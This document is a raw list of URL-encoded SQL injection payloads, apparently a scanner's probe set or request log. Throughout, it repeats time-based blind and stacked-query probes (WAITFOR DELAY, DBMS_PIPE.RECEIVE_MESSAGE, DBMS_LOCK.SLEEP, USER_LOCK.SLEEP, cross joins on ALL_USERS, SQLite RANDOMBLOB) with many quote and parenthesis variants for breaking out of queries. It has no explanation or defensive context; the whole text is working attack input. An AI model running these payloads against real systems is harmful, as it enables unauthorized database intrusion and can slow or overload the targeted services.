1%27%2B%28SELECT%20%27LQcg%27%20WHERE%206427%3D6427%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%27%20IN%20BOOLEAN%20MODE%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2883%29%7C%7CCHR%2898%29%7C%7CCHR%2868%29%2C5%29%20FROM%20DUAL-- 1%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2883%29%7C%7CCHR%2898%29%7C%7CCHR%2868%29%2C5%29%20FROM%20DUAL-- 1%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2883%29%7C%7CCHR%2898%29%7C%7CCHR%2868%29%2C5%29%20FROM%20DUAL-- 1%29%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2883%29%7C%7CCHR%2898%29%7C%7CCHR%2868%29%2C5%29%20FROM%20DUAL-- 1%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2883%29%7C%7CCHR%2898%29%7C%7CCHR%2868%29%2C5%29%20FROM%20DUAL-- 1%29%20WHERE%201014%3D1014%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2883%29%7C%7CCHR%2898%29%7C%7CCHR%2868%29%2C5%29%20FROM%20DUAL-- 1%20WHERE%203709%3D3709%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2883%29%7C%7CCHR%2898%29%7C%7CCHR%2868%29%2C5%29%20FROM%20DUAL-- 1%27%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2883%29%7C%7CCHR%2898%29%7C%7CCHR%2868%29%2C5%29%20FROM%20DUAL-- 1%27%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2883%29%7C%7CCHR%2898%29%7C%7CCHR%2868%29%2C5%29%20FROM%20DUAL-- 1%22%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2883%29%7C%7CCHR%2898%29%7C%7CCHR%2868%29%2C5%29%20FROM%20DUAL-- 1%27%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2883%29%7C%7CCHR%2898%29%7C%7CCHR%2868%29%2C5%29%20FROM%20DUAL-- 1%27%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2883%29%7C%7CCHR%2898%29%7C%7CCHR%2868%29%2C5%29%20FROM%20DUAL-- 1%27%29%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2883%29%7C%7CCHR%2898%29%7C%7CCHR%2868%29%2C5%29%20FROM%20DUAL-- 1%27%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2883%29%7C%7CCHR%2898%29%7C%7CCHR%2868%29%2C5%29%20FROM%20DUAL-- 1%27%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2883%29%7C%7CCHR%2898%29%7C%7CCHR%2868%29%2C5%29%20FROM%20DUAL-- 1%27%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2883%29%7C%7CCHR%2898%29%7C%7CCHR%2868%29%2C5%29%20FROM%20DUAL-- 1%27%29%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2883%29%7C%7CCHR%2898%29%7C%7CCHR%2868%29%2C5%29%20FROM%20DUAL-- 1%27%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2883%29%7C%7CCHR%2898%29%7C%7CCHR%2868%29%2C5%29%20FROM%20DUAL-- 1%22%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2883%29%7C%7CCHR%2898%29%7C%7CCHR%2868%29%2C5%29%20FROM%20DUAL-- 1%22%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2883%29%7C%7CCHR%2898%29%7C%7CCHR%2868%29%2C5%29%20FROM%20DUAL-- 1%22%29%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2883%29%7C%7CCHR%2898%29%7C%7CCHR%2868%29%2C5%29%20FROM%20DUAL-- 1%22%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2883%29%7C%7CCHR%2898%29%7C%7CCHR%2868%29%2C5%29%20FROM%20DUAL-- 1%22%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2883%29%7C%7CCHR%2898%29%7C%7CCHR%2868%29%2C5%29%20FROM%20DUAL-- 1%22%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2883%29%7C%7CCHR%2898%29%7C%7CCHR%2868%29%2C5%29%20FROM%20DUAL-- 1%22%29%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2883%29%7C%7CCHR%2898%29%7C%7CCHR%2868%29%2C5%29%20FROM%20DUAL-- 1%22%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2883%29%7C%7CCHR%2898%29%7C%7CCHR%2868%29%2C5%29%20FROM%20DUAL-- 1%25%27%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2883%29%7C%7CCHR%2898%29%7C%7CCHR%2868%29%2C5%29%20FROM%20DUAL-- 1%25%27%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2883%29%7C%7CCHR%2898%29%7C%7CCHR%2868%29%2C5%29%20FROM%20DUAL-- 1%25%27%29%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2883%29%7C%7CCHR%2898%29%7C%7CCHR%2868%29%2C5%29%20FROM%20DUAL-- 1%25%27%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2883%29%7C%7CCHR%2898%29%7C%7CCHR%2868%29%2C5%29%20FROM%20DUAL-- 1%00%27%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2883%29%7C%7CCHR%2898%29%7C%7CCHR%2868%29%2C5%29%20FROM%20DUAL-- 1%00%27%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2883%29%7C%7CCHR%2898%29%7C%7CCHR%2868%29%2C5%29%20FROM%20DUAL-- 1%27%29%20WHERE%206208%3D6208%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2883%29%7C%7CCHR%2898%29%7C%7CCHR%2868%29%2C5%29%20FROM%20DUAL-- 1%22%29%20WHERE%206105%3D6105%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2883%29%7C%7CCHR%2898%29%7C%7CCHR%2868%29%2C5%29%20FROM%20DUAL-- 1%27%20WHERE%206929%3D6929%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2883%29%7C%7CCHR%2898%29%7C%7CCHR%2868%29%2C5%29%20FROM%20DUAL-- 1%22%20WHERE%203423%3D3423%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2883%29%7C%7CCHR%2898%29%7C%7CCHR%2868%29%2C5%29%20FROM%20DUAL-- 1%27%7C%7C%28SELECT%20%27UQvy%27%20FROM%20DUAL%20WHERE%202809%3D2809%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2883%29%7C%7CCHR%2898%29%7C%7CCHR%2868%29%2C5%29%20FROM%20DUAL-- 1%27%7C%7C%28SELECT%20%27IWkO%27%20WHERE%207693%3D7693%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2883%29%7C%7CCHR%2898%29%7C%7CCHR%2868%29%2C5%29%20FROM%20DUAL-- 1%27%2B%28SELECT%20gTKk%20WHERE%209612%3D9612%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2883%29%7C%7CCHR%2898%29%7C%7CCHR%2868%29%2C5%29%20FROM%20DUAL-- 1%27%2B%28SELECT%20%27KZZQ%27%20WHERE%209596%3D9596%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2883%29%7C%7CCHR%2898%29%7C%7CCHR%2868%29%2C5%29%20FROM%20DUAL-- 1%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2883%29%7C%7CCHR%2898%29%7C%7CCHR%2868%29%2C5%29%20FROM%20DUAL-- 1%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1%29%20WHERE%207480%3D7480%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1%20WHERE%205236%3D5236%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1%22%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1%22%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1%22%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1%22%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1%22%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1%22%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1%25%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1%25%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1%25%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1%25%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1%00%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1%00%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1%27%29%20WHERE%201298%3D1298%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1%22%29%20WHERE%203639%3D3639%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1%27%20WHERE%201346%3D1346%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1%22%20WHERE%204826%3D4826%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1%27%7C%7C%28SELECT%20%27PeCJ%27%20FROM%20DUAL%20WHERE%207742%3D7742%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1%27%7C%7C%28SELECT%20%27Swly%27%20WHERE%204620%3D4620%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1%27%2B%28SELECT%20zLUf%20WHERE%207100%3D7100%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1%27%2B%28SELECT%20%27xIbR%27%20WHERE%207752%3D7752%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1%29%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1%29%20WHERE%205039%3D5039%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1%20WHERE%204761%3D4761%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1%27%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1%27%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1%22%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1%27%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1%27%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1%27%29%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1%27%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1%27%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1%27%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1%27%29%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1%27%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1%22%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1%22%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1%22%29%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1%22%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1%22%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1%22%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1%22%29%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1%22%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1%25%27%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1%25%27%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1%25%27%29%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1%25%27%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1%00%27%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1%00%27%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1%27%29%20WHERE%204861%3D4861%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1%22%29%20WHERE%208983%3D8983%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1%27%20WHERE%209086%3D9086%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1%22%20WHERE%205452%3D5452%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1%27%7C%7C%28SELECT%20%27zZdE%27%20FROM%20DUAL%20WHERE%208061%3D8061%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1%27%7C%7C%28SELECT%20%27kVbO%27%20WHERE%204378%3D4378%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1%27%2B%28SELECT%20zcYn%20WHERE%208351%3D8351%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1%27%2B%28SELECT%20%27IxYR%27%20WHERE%205685%3D5685%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1%27%20IN%20BOOLEAN%20MODE%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END-- 1%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1%29%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1%29%20WHERE%204536%3D4536%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1%20WHERE%203331%3D3331%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1%27%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1%27%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1%22%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1%27%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1%27%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1%27%29%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1%27%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1%27%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1%27%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1%27%29%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1%27%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1%22%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1%22%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1%22%29%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1%22%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1%22%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1%22%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1%22%29%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1%22%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1%25%27%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1%25%27%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1%25%27%29%29%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1%25%27%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1%00%27%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1%00%27%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1%27%29%20WHERE%208667%3D8667%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1%22%29%20WHERE%205918%3D5918%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1%27%20WHERE%209650%3D9650%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1%22%20WHERE%207591%3D7591%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1%27%7C%7C%28SELECT%20%27ZJKx%27%20FROM%20DUAL%20WHERE%203582%3D3582%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1%27%7C%7C%28SELECT%20%27GmEN%27%20WHERE%201248%3D1248%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1%27%2B%28SELECT%20qXld%20WHERE%207538%3D7538%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1%27%2B%28SELECT%20%27NPyb%27%20WHERE%203600%3D3600%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1%27%20IN%20BOOLEAN%20MODE%29%3B%20BEGIN%20USER_LOCK.SLEEP%285%29%3B%20END-- 1%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%29%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%29%20WHERE%209502%3D9502%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%20WHERE%201925%3D1925%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%27%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%27%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%22%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%27%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%27%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%27%29%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%27%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%27%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%27%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%27%29%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%27%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%22%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 1%22%29%29%3B%20SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 